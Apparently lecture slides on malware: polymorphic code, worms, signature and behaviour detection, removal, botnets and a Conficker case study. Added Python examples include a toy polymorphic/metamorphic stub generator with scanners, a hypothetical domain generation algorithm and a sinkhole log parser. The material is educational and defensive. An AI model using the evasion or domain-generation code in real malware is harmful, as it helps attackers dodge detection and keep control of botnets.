(the message in data_59 translates as: "The best cassette is the POLIMER cassette! Buy this one!")
Sample polymorphic code: the basis (from Wikipedia)
Start:
  GOTO Decryption_Code
Encrypted:
  ... lots of encrypted code ...
Decryption_Code:
  A = Encrypted
Loop:
  B = *A
  B = B XOR CryptoKey
  *A = B
  A = A + 1
  GOTO Loop IF NOT A = Decryption_Code
  GOTO Encrypted
CryptoKey:
  some_random_number
The polymorphic equivalent (junk operations on C change the bytes, not the behaviour)
Start:
  GOTO Decryption_Code
Encrypted:
  ... lots of encrypted code ...
Decryption_Code:
  C = C + 1
  A = Encrypted
Loop:
  B = *A
  C = 3214 * A
  B = B XOR CryptoKey
  *A = B
  C = 1
  C = A + B
  A = A + 1
  GOTO Loop IF NOT A = Decryption_Code
  C = C^2
  GOTO Encrypted
CryptoKey:
  some_random_number
Macro virus
Became very common in the mid-1990s, since it is platform independent, infects documents, and spreads easily.
Exploits the macro capability of office applications: an executable program embedded in an office document, often a form of Basic.
More recent releases include protection, and they are recognized by many anti-virus programs.
Rogue security software (list from Wikipedia)
I guess you expected a shorter list; the number of rogue security software products rose at an insane rate in the last few years.
Limits of malware
Malware can fully control a computer: read memory and files; record keyboard, mouse and screen activity; use the webcam and microphone; find all archived information (emails, stored passwords, web history, stored files, etc.).
Malware can hide itself very efficiently; currently it is almost always identifiable, but later?
Security schemes with additional hardware are needed (smart card, token, OTP generator with or without challenge), but remember: the computer is still controlled by the attacker. There is no easy solution to the untrusted terminal problem.
Therefore it is essential to avoid malware infections.
Of course, in practice malware is not perfect, but expect the worst case.
Worms
A replicating program that propagates over the network using email, remote execution, remote login.
Has phases like a virus: dormant, propagation, triggering, execution.
Propagation phase: searches for other systems, connects to them, copies itself there and runs.
May disguise itself as a system process.
The concept was seen in Brunner's The Shockwave Rider and implemented by Xerox Palo Alto labs in the 1980s.
Worm propagation model
Famous worm attacks
Code Red, July 2001: exploited an MS IIS bug, probed random IP addresses, did a DDoS attack, consumed significant network capacity when active. The Code Red II variant included a backdoor.
SQL Slammer, early 2003: attacked MS SQL Server; compact and very rapid spread.
Mydoom: mass-mailing e-mail worm that appeared in 2004; installed a remote-access backdoor on infected systems.
Nowadays: one after the other, hard to keep up with new worms/botnets.
Identification of malware
Based on signatures (hard to make for polymorphic or metamorphic code):
in files (viruses), in network traffic (worms, email viruses), in memory (infected hosts, e.g. botnets).
Highly optimized (thousands of signatures have to be matched).
Based on behavior: anomaly detection, checking code (e.g. for unpacking), heuristic algorithms with scoring.
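Why a byte signature still catches a simply-encrypted virus but not a metamorphic one, tying together the Old-school file virus slide (the constant decryption part), the polymorphic-code sketch and the signature point above. This is an added, constructed example: the "virus body", the stub bytes (the instruction equivalents are the slide's xor ax,ax / mov ax,0 / sub ax,ax) and the signature are toy values, not a real sample. The second scanner brute-forces the one-byte XOR key, the decrypt-then-scan ("X-raying") approach AV engines use against exactly this kind of encryption.

```python
"""Signature scanning vs. XOR-key brute force against polymorphic and metamorphic stubs."""

BODY = b"PAYLOAD: infect *.COM, show message"      # constructed plaintext virus body
MARKER = b"PAYLOAD:"                               # what the decrypt-then-scan step looks for
CLEAN = b"MZ\x90\x00 an ordinary program, nothing hidden"   # constructed clean file

# Each slot holds byte sequences with identical effect (x86, 16-bit):
EQUIVALENTS = [
    [b"\x31\xc0", b"\xb8\x00\x00", b"\x29\xc0"],   # xor ax,ax / mov ax,0 / sub ax,ax
    [b"\xbe\x00\x01", b"\x90\xbe\x00\x01"],        # mov si,0x100, optionally preceded by nop
    [b"\x8a\x04", b"\x90\x8a\x04"],                # mov al,[si], optionally preceded by nop
]
N_VARIANTS = 3 * 2 * 2


def xor_crypt(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def make_stub(variant: int) -> bytes:
    """Pick one equivalent per slot; variant 0 is the 'canonical' stub."""
    out = b""
    for slot in EQUIVALENTS:
        out += slot[variant % len(slot)]
        variant //= len(slot)
    return out


STUB = make_stub(0)          # the constant decryptor of the polymorphic-lite virus
SIGNATURE = STUB             # what a signature-based scanner would be shipped with


def make_generation(key: int) -> bytes:
    """Polymorphic-lite: same stub, new key, body re-encrypted on every infection."""
    return STUB + bytes([key]) + xor_crypt(BODY, key)


def make_metamorphic(key: int, variant: int) -> bytes:
    """Metamorphic: the stub itself is rewritten with equivalent instructions."""
    return make_stub(variant) + bytes([key]) + xor_crypt(BODY, key)


def signature_scan(sample: bytes) -> bool:
    return SIGNATURE in sample


def xray_scan(sample: bytes, marker: bytes = MARKER) -> bool:
    """Try every one-byte XOR key; key 0 covers an unencrypted body as well."""
    return any(marker in xor_crypt(sample, key) for key in range(256))


if __name__ == "__main__":
    g1, g2 = make_generation(0x5A), make_generation(0xA7)
    print("bodies differ:", g1[len(STUB) + 1:] != g2[len(STUB) + 1:])
    print("signature hits both generations:", signature_scan(g1) and signature_scan(g2))
    print("signature hits metamorphic variants:",
          [signature_scan(make_metamorphic(0x5A, v)) for v in range(1, N_VARIANTS)])
    print("x-ray hits metamorphic:", xray_scan(make_metamorphic(0x5A, 7)))
```

The brute-force scanner costs 256 passes over the file instead of one substring search, which is the "highly optimized" tension noted above: decrypt-then-scan is only affordable as a second stage on suspicious files, and a real virus can raise the cost further with a longer key or a different operation per generation.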
Removal of malware
First step: terminate the running malware (not possible every time).
The malware might stop the removal tool.
The malware might detect our plans and do bad things (e.g. delete files).
Some malware runs in multiple tasks to avoid being stopped.
Some malware is specially designed to download more malware; all of it should be removed.
The files of the malware should be identified:
based on signatures;
check auto-start applications;
it can be deep in the OS (modified kernel, modified BIOS);
for traditional viruses the code is injected into a binary executable.
Remove the malware:
generally a simple file deletion is enough;
for a traditional virus the code has to be extracted from the host software: a hard task, virus killers exist, but not for every virus;
backdoors or re-infection tricks made by the malware should also be cleared (not very common);
the vulnerability should also be handled to avoid re-infection;
some junk might remain (including text files with collected passwords!).
Most malware has a mechanism to avoid multiple infections; this might be used as a trick to protect hosts (e.g. modifying the exe header), but it might corrupt some files while others remain unaffected.
Future of malware
Stuxnet is a great example of a targeted attack, where the goal of the adversary is to attack a very specific target; in this case the target was some industrial facilities (related to the nuclear program) in Iran.
Advanced persistent threat (APT) usually refers to a group, such as a foreign nation-state government, with both the capability and the intent to persistently and effectively target a specific entity.
Virtualization, malware analysis, collaborative countermeasures, mobile phones, embedded systems: a lot of open questions in the field of malware.
Botnet = roBOT NETwork
Infecting machines; forming a network out of the infected machines; waiting for control; attacking on command (DDoS, spam, etc.); updating; further infections, etc.
The size of the largest botnets is in the order of millions.
Botnet history
DDoS botnet with IRC
(figure: attacker -> Internet -> IRC server 1 ... IRC server n -> attacking computers, zombies -> target)
IRC (Internet Relay Chat), censored
IRC botnets
A controller can send messages to a channel; the messages are received by the bots on the same channel (the servers relay the messages).
The channel might be protected, e.g. with a password (of course, this can be recovered from active bots or by sniffing network activity: IRC is a cleartext protocol).
The messages contain the commands of the controller/owner.
Bots can test the authenticity of the messages in some fashion.
Centralized vs. P2P botnets
IRC-based and other centralized botnets have drawbacks. A new trend for botnets is using P2P technologies; DHT (distributed hash table) based techniques are common. However, e.g. the delay might be higher for P2P botnets.
               Planning   Botnet detection   Delay        Survivability   Identification of the controller/owner
centralized    easy (1)   easy (1)           small (3)    bad (1)         easy (1)
P2P            hard (3)   hard (3)           medium (2)   good (3)        hard (3)
How to determine the size of the botnet?
- The size of the botnet is an important parameter: a large botnet can be more dangerous.
- Counting individual IP addresses can give false results (e.g. several bots behind one NAT address).
- The size of the botnet constantly changes, and counting also takes time -> error.
- IRC-based botnets: the activity of the bots might be visible, easy to count.
- P2P botnets: e.g. doing queries in the DHT; sometimes the botnet uses IDs to identify individual bots, so the last ID might be queried.
What to do against botnets
- Identification, size estimation.
- Upgrade, patch against vulnerabilities (sometimes the patch itself gives hints to the attackers).
- Patching the vulnerable hosts remotely: illegal.
- Finding the owner of the botnet: hard task.
- Getting control over the botnet: the better the botnet, the harder this is.
- Supporting removal (by tools, knowledge): slow.
- Eliminating the upgrade possibilities (e.g. domains, web pages) or the control mechanism (disabling communication, injecting code): harder and harder.
Conficker botnet
- The MS08-067 vulnerability is used.
- A, B and C variants exist (as of 05/2009).
- Conficker is a DLL; using the vulnerability it inserts itself into the system as a system service.
- It also uses USB drives to infect: DLL + rundll32.exe (turn off auto-run for USB drives!).
- Update: time-seeded random domain names are used to download encrypted binaries over HTTP.
- Source: analysis of honeynet.org
Vulnerability used by Conficker
- Vulnerability: NetpwPathCanonicalize() in netapi32.dll.
- On an established SMB channel (port 445), a path string is canonicalized, e.g. aaa\bbb\..\ccc -> aaa\bbb
- With a specially crafted path string it is possible to move beyond the start of a stack buffer and overwrite the return address (not a classical buffer overflow, but similar).
- PEB shellcode is used; 00 bytes are avoided with an XOR encryption routine.
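As an added illustration (not code from the slides), a canonicalizer that handles `..` the safe way: before stepping back it checks that a preceding component actually exists, which is exactly the check whose absence lets a walk run past the start of the buffer. It follows the usual rule that `..` discards the preceding component, so aaa\bbb\..\ccc becomes aaa\ccc.

```python
from typing import List

def canonicalize(path: str) -> str:
    """Collapse '.' and '..' components of a Windows-style path.

    Components are kept on a stack; '..' pops the previous one. When the
    stack is already empty there is nothing to step back into, so the
    function refuses the path instead of walking backwards.
    """
    absolute = path.startswith(("\\", "/"))
    stack: List[str] = []
    for part in path.replace("/", "\\").split("\\"):
        if part in ("", "."):
            continue                      # doubled separator or current dir
        if part == "..":
            if not stack:
                # The missing bounds check: '..' with nothing left to remove
                raise ValueError(f"'..' escapes the start of {path!r}")
            stack.pop()
            continue
        stack.append(part)
    return ("\\" if absolute else "") + "\\".join(stack)

def is_safe(path: str) -> bool:
    """True if the path canonicalizes without escaping its starting point."""
    try:
        canonicalize(path)
        return True
    except ValueError:
        return False
```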
Conficker hooks some system calls
- E.g. DNS: to filter out antivirus websites
NetpwCanonicalize hook
- First of all: no other botnet should be able to infect this computer.
- Conficker: if \..\ is found, then the shellcode is checked. It can decide whether the exploit is coming from another Conficker instance.
- If a special http://.. string is found in the data, Conficker tries to use it to update itself.
- The behavior of the function is slightly modified -> this gives the ability to detect the bot.
- Update checking: if the RSA signature does not exist -> no update (SHA-1, 1024-bit RSA -> latest Conficker: 4096-bit RSA + unknown hash).
- SHA-1 is taken from the OpenSSL library.
Upgrade mechanism
- Domain flux: for the update, Conficker A/B generates 250 random domain names each, daily. Antivirus companies tried to preregister them.
- Conficker.C uses 50.000 domain names daily.
- The PRNG is seeded by the current time.
- Time synchronization: it downloads web pages (google, yahoo, ...) and uses the time data (day, month, year) in the HTTP response.
Conficker domain generation algorithm (figure)
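An added example, not Conficker's real algorithm and not code from the slides: a hypothetical, deliberately simple time-seeded domain generator that takes its date from the Date header of an HTTP response, as the previous slide describes. The point for a defender is the one the slide makes about preregistration: whoever knows the algorithm and the date can enumerate the same names in advance and sinkhole them. The TLD list and the HTTP response are constructed.

```python
import hashlib
import random
from datetime import date
from email.utils import parsedate_to_datetime
from typing import List

TLDS = ["com", "net", "org", "info", "biz"]   # constructed list

def day_from_http_response(raw_response: bytes) -> date:
    """Take the day from the Date: header of an HTTP response, i.e. sync
    from a well-known site instead of trusting the local clock."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:        # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "date":
            return parsedate_to_datetime(value.strip()).date()
    raise ValueError("no Date header in response")

def daily_domains(day: date, count: int) -> List[str]:
    """Derive `count` names deterministically from the day only (hypothetical
    DGA): same day -> same list, for the bot and for the defender alike."""
    seed = int.from_bytes(
        hashlib.sha256(day.isoformat().encode()).digest()[:8], "big")
    rng = random.Random(seed)
    names = []
    for _ in range(count):
        length = rng.randint(8, 11)
        label = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz")
                        for _ in range(length))
        names.append(f"{label}.{rng.choice(TLDS)}")
    return names

# Constructed HTTP response, as a bot's time source would return it
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Date: Wed, 06 May 2009 10:15:32 GMT\r\n"
                   b"Content-Type: text/html\r\n\r\n<html></html>")

if __name__ == "__main__":
    today = day_from_http_response(SAMPLE_RESPONSE)
    # A defender running the same code a day ahead knows which names to
    # preregister or sinkhole before the bots start querying them.
    for name in daily_domains(today, 250)[:5]:
        print(name)
```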
Conficker upgrade
- The generated domain names are checked for updates.
- Updates are protected with RSA signatures; the public key is in the bot itself.
- The key is 1024 bits long in Conficker.A, 4096 bits for the other variants.
- The public key is a good signature to search for (bot identification).
Conficker blacklists
- Conficker uses a blacklist of network addresses (IP numbers) to avoid identification, and to avoid scanning low-yield networks (expecting that most of the computers there are patched).
- E.g. IP addresses of the following companies are included: Kaspersky, Trend Micro, Symantec, McAfee, F-Secure, Avira, Bitdefender, Microsoft Corp., Microsoft Education, Microsoft License, Microsoft Visual Studios
Removal of Conficker
- Conficker detects removal tools and tries to avoid removal.
- The Conficker code is packed (polymorphic) on the network and in the file system; however, on the target computer the code is unpacked while running, so it is easier to detect in running processes.
- The code is stored under random file names (not fully random; it depends on the variant).
- Special flags and security settings are set on the file.
- Every instance has to be removed to avoid re-infection.
- A trick: Conficker uses OS mutexes to avoid running multiple instances. The mutex generation is based on a CRC. This might be used to avoid reinfections.
Hidden Conficker file (screenshot)
How to identify bots in Conficker
- DNS sinkhole (antivirus countermeasure): register the update DNS names used by Conficker and receive the queries from infected computers. Although no code can be injected into the botnet (the RSA signature check would fail), the querying computer can be identified.
- Scanning infected computers (removal tools): problematic.
- Using the P2P approach of Conficker.
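An added example (not the slides' own tooling) that connects the sinkhole above with the earlier size-estimation slide: it reads a constructed sinkhole query log, counts distinct source IPs as a lower bound, and applies a labelled heuristic for NAT: a single bot asks for each generated name once, so an address that repeats the same name is taken to hide that many bots. The log format is assumed for the example.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# Constructed query log of a sinkhole name server, one line per query:
# timestamp, source IP, queried name. A malformed line is included on purpose.
SINKHOLE_LOG = """\
2009-05-06T10:00:01Z 198.51.100.7 qwvzkhpd.com
2009-05-06T10:00:03Z 198.51.100.7 hjspzlrmq.net
2009-05-06T10:00:04Z 203.0.113.20 uxnwzqdx.org
2009-05-06T10:00:05Z 203.0.113.20 qwvzkhpd.com
2009-05-06T10:00:05Z 203.0.113.20 uxnwzqdx.org
2009-05-06T10:00:06Z 203.0.113.20 qwvzkhpd.com
this line is malformed and must be skipped
2009-05-06T10:00:09Z 192.0.2.9 hjspzlrmq.net
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\S+)$")

def parse_sinkhole_log(log: str) -> List[Tuple[str, str, str]]:
    """Return (timestamp, ip, name) per well-formed line; skip the rest."""
    records = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append((m.group(1), m.group(2), m.group(3).lower()))
    return records

def estimate_bots(log: str) -> Dict[str, object]:
    """Distinct source IPs give a lower bound on the bot count (the sinkhole
    only sees the querying address, it cannot push code to it). Heuristic:
    the largest repeat count of one name from one IP is the number of bots
    behind that IP, since each bot queries each generated name once."""
    repeats = Counter((ip, name) for _, ip, name in parse_sinkhole_log(log))
    bots_behind: Dict[str, int] = {}
    for (ip, name), n in repeats.items():
        bots_behind[ip] = max(bots_behind.get(ip, 0), n)
    return {
        "distinct_ips": len(bots_behind),
        "nat_adjusted": sum(bots_behind.values()),
        "nat_suspects": sorted(ip for ip, n in bots_behind.items() if n > 1),
    }

if __name__ == "__main__":
    print(estimate_bots(SINKHOLE_LOG))
```

The heuristic overcounts if a bot retries a failed query, which is one more reason the slide calls the count an estimate that changes over time.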
Conficker.C: http://mtc.sri.com/conficker/addendumc/